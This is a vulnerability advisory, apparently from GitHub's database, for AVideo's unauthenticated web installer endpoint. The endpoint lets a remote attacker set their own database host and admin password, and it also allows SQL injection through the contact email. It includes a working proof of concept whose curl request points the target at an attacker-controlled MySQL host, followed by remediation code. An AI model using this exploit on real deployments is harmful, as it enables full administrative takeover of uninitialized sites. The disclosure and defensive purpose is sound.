The install/checkConfiguration.php endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.
install/checkConfiguration.php — entire file (lines 1-273)The checkConfiguration.php file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:
// install/checkConfiguration.php — lines 2-5
if (file_exists("../videos/configuration.php")) {
error_log("Can not create configuration again: ". json_encode($_SERVER));
exit;
}
If videos/configuration.php does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.
Unlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:
// install/checkConfiguration.php — line 25
$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], "", $_POST['databasePort']);
The attacker can:
databaseHost to their server's IPThe admin user is created with direct POST parameter concatenation into SQL:
// install/checkConfiguration.php — line 120
$sql = "INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '"
. $_POST['contactEmail'] . "', '" . md5($_POST['systemAdminPass']) . "', now(), now(), true)";
This has two issues: (1) the attacker controls the admin password, and (2) $_POST['contactEmail'] is directly concatenated into SQL without escaping (SQL injection).
The configuration file is written to disk with all attacker-supplied values embedded:
// install/checkConfiguration.php — lines 238-247
$videosDir = $_POST['systemRootPath'].'videos/';
if(!is_dir($videosDir)){
mkdir($videosDir, 0777, true);
}
$fp = fopen("{$videosDir}configuration.php", "wb");
fwrite($fp, $content);
fclose($fp);
The $content variable (built at lines 188-236) embeds $_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], $_POST['webSiteRootURL'], $_POST['systemRootPath'], and $_POST['salt'] directly into the PHP configuration file.
The CLI installer (install/install.php) properly restricts access:
// install/install.php — lines 3-5
if (!isCommandLineInterface()) {
die('Command Line only');
}
The web endpoint (checkConfiguration.php) lacks any equivalent protection, creating an inconsistent defense pattern.
There is no .htaccess file in the install/ directory. The root .htaccess does not block access to install/. The endpoint is directly accessible at /install/checkConfiguration.php.
videos/configuration.php does not exist (fresh or re-deployed)/install/checkConfiguration.php with their own database host, admin password, and site configurationconfiguration.php is written to disk, permanently configuring the applicationStep 1: Set up an attacker-controlled MySQL server with the AVideo schema:
# On attacker's server
mysql -e "CREATE DATABASE avideo;"
mysql avideo < database.sql # Use AVideo's own schema file
Step 2: Send the installation request to the target:
curl -s -X POST https://TARGET/install/checkConfiguration.php \
-d 'systemRootPath=/var/www/html/AVideo/' \
-d 'databaseHost=ATTACKER_MYSQL_IP' \
-d 'databasePort=3306' \
-d 'databaseUser=attacker' \
-d 'databasePass=attacker_pass' \
-d 'databaseName=avideo' \
-d 'createTables=1' \
-d 'contactEmail=attacker@example.com' \
-d 'systemAdminPass=AttackerPass123!' \
-d 'webSiteTitle=Pwned' \
-d 'mainLanguage=en_US' \
-d 'webSiteRootURL=https://TARGET/'
Step 3: Log in as admin:
Username: admin
Password: AttackerPass123!
The attacker now has full administrative access. If using their own database, they control all application data.
videos/configuration.php file is written with attacker-controlled database credentials, ensuring persistent access even after the attack$_POST['contactEmail'] on line 120 is directly concatenated into SQL, allowing additional database manipulationGenerate a random setup token during deployment that must be provided to complete installation:
// At the top of install/checkConfiguration.php, after the file_exists check:
// Require a setup token that was generated during deployment
$setupTokenFile = __DIR__ . '/../videos/.setup_token';
if (!file_exists($setupTokenFile)) {
$obj = new stdClass();
$obj->error = "Setup token file not found. Create videos/.setup_token with a random secret.";
header('Content-Type: application/json');
echo json_encode($obj);
exit;
}
$expectedToken = trim(file_get_contents($setupTokenFile));
if (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {
$obj = new stdClass();
$obj->error = "Invalid setup token.";
header('Content-Type: application/json');
echo json_encode($obj);
exit;
}
Block web access to the installer entirely:
// At the top of install/checkConfiguration.php, after the file_exists check:
if (!isCommandLineInterface()) {
$allowedIPs = ['127.0.0.1', '::1'];
if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {
header('Content-Type: application/json');
echo json_encode(['error' => 'Installation is only allowed from localhost']);
exit;
}
}
Additionally, add an .htaccess file in the install/ directory:
# install/.htaccess
<Files "checkConfiguration.php">
Require local
</Files>
$stmt = $mysqli->prepare("INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)");
$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()
$stmt->bind_param("ss", $_POST['contactEmail'], $hashedPass);
$stmt->execute();
md5() to password_hash() with PASSWORD_BCRYPT or PASSWORD_ARGON2ID.This vulnerability was discovered and reported by bugbunny.ai.
{
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T19:46:40Z",
"nvd_published_at": "2026-03-20T06:16:11Z",
"severity": "HIGH"
}